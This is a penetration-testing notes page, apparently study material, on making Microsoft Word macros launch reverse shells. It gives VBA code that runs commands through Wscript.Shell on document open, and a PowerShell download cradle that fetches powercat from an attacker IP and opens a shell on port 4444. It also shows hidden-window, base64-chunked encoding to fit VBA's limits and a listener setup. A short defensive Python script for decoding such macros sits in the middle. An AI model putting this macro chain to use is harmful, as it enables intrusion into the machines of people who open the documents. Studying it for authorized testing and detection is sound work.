TamaGorengs Notes
  • πŸ‘¨β€πŸ’»Whoami
  • πŸ—ΊοΈActive Directory
    • Active Directory Enumeration
    • AD Reconnaissance
      • LDAP
    • Movement
      • Kerberos
        • ASREProast
        • Pass The Hash
        • Pass The Ticket
        • Overpass The Hash
      • Credential
        • Dumping
          • DCSync
      • WMI and WinRM
    • Active Directory Certificate Services (ADCS)
  • πŸͺŸWindows
    • Windows Privilege Escalation
      • WinPrivEsc Enumeration
      • Leveraging Windows Services
      • Abusing Other Windows Components
    • RDP
  • 🐧Linux
    • Linux Privilege Escalation
      • LinuxPrivEsc Enumeration
      • Exposed Confidential Information
      • Insecure File Permissions
      • Insecure System Components
  • πŸ•ΈοΈWeb Application
    • SQL Injection
    • Cross-Site Scripting (XSS)
  • Group 1
    • Client-Side Attacks
      • Windows Library Files
      • Exploiting Microsoft Office
  • Thick Client
    • Thick Client Pentest
    • Thick Client Pentest Methodology
Powered by GitBook
On this page
  • Leveraging Microsoft Word Macros for Reverse Shells
  • Overview
  • Key Points
  • Summary

Was this helpful?

  1. Group 1
  2. Client-Side Attacks

Exploiting Microsoft Office

Leveraging Microsoft Word Macros for Reverse Shells

Overview

Microsoft Word macros, written in Visual Basic for Applications (VBA), can automate tasks and serve as a powerful client-side attack vector when maliciously crafted. This guide outlines the creation of a macro to launch a reverse shell using PowerShell.


Key Points

1. Macro Basics

  • What are Macros?

    • Macros are written in VBA, offering full access to ActiveX objects and the Windows Script Host.

    • The document must be saved as .doc or .docm to carry a macro; a .docx file cannot store macros, so Word discards them when saving in that format.


2. Macro Setup

Steps:

  1. Save a Word document as .doc.

  2. Access the macro menu via View > Macros > Create.

  3. Develop the macro in the Visual Basic for Applications editor.

Default Macro Skeleton:

Sub MyMacro()
'
' MyMacro Macro
'
End Sub

3. Executing Commands with ActiveX

Example Macro to Open PowerShell:

Sub MyMacro()
    CreateObject("Wscript.Shell").Run "powershell"
End Sub

4. Auto-Execution

Use AutoOpen and Document_Open to ensure macros execute when the document opens:

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

5. Creating a Reverse Shell

PowerShell Download Cradle:

IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>/powercat.ps1');powercat -c <IP> -p 4444 -e powershell

  • Base64-encode the command to avoid issues with special characters.


6. Embedding Encoded Commands

Split the base64-encoded string into chunks and concatenate them, because VBA limits a single string literal to 255 characters:

Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc BASE64_ENCODED_COMMAND_PART1"
    Str = Str + "BASE64_ENCODED_COMMAND_PART2"
    ...
    CreateObject("Wscript.Shell").Run Str
End Sub
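Steps 5 and 6 describe the encoded, chunked command line a defender meets when triaging such a document. The Python below is an added example, not part of the original notes: it reassembles a `Str = Str + "..."` build-up, flags the auto-execution entry points and the `Wscript.Shell` call, and decodes the `-enc` argument, which PowerShell expects as base64 of the UTF-16LE command text rather than of plain ASCII. The macro text is a constructed sample whose encoded payload is the harmless `Get-Date`.

```python
import base64
import re

# Constructed sample in the shape described above: auto-exec stubs, Wscript.Shell,
# and a -enc payload split across string concatenations. The encoded payload is
# the benign command Get-Date, not a download cradle.
SAMPLE_VBA = """Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc RwBlAHQALQBE"
    Str = Str + "AGEAdABlAA=="
    CreateObject("Wscript.Shell").Run Str
End Sub
"""

# Procedure names Office runs automatically on open/close (Word and Excel).
AUTOEXEC = ("AutoOpen", "Document_Open", "AutoExec", "AutoClose", "Workbook_Open")

def rebuild_strings(vba: str) -> dict:
    """Reassemble variables built up by repeated `X = X + "..."` or `X = X & "..."`."""
    parts = {}
    for m in re.finditer(r'^\s*(\w+)\s*=\s*\1\s*[+&]\s*"((?:[^"]|"")*)"', vba, re.M):
        parts.setdefault(m.group(1), []).append(m.group(2).replace('""', '"'))
    return {name: "".join(chunks) for name, chunks in parts.items()}

def decode_encoded_command(cmdline: str):
    """Decode PowerShell's -enc/-EncodedCommand argument: base64 over UTF-16LE text."""
    m = re.search(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")

def triage(vba: str) -> dict:
    """Summarise the indicators an analyst checks first in a suspect macro."""
    found = [name for name in AUTOEXEC if re.search(rf"\bSub\s+{name}\b", vba)]
    strings = rebuild_strings(vba)
    decoded = {k: decode_encoded_command(v) for k, v in strings.items()}
    return {
        "autoexec": found,
        "wscript_shell": bool(re.search(r"wscript\.shell", vba, re.I)),
        "rebuilt": strings,
        "decoded": {k: v for k, v in decoded.items() if v},
    }
```

Run `triage(SAMPLE_VBA)` to see the rebuilt command line and its decoded payload; the same functions work on VBA source extracted from a real document with a tool such as olevba.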

7. Testing

  1. Start a Python web server to host powercat.ps1.

  2. Use a Netcat listener to catch the reverse shell.

  3. Open the Word document and enable macros.


Summary

  • Objective: Exploit Word macros for initial footholds in enterprise networks.

  • Outcome: A reverse shell is achieved using a malicious macro that downloads and executes PowerCat via PowerShell.

  • Challenges:

    • Victim must enable macros.

    • Increased awareness and security controls make delivery harder.

Macros remain effective but increasingly challenging to deliver, necessitating alternative or supplementary attack vectors.


Last updated 4 months ago
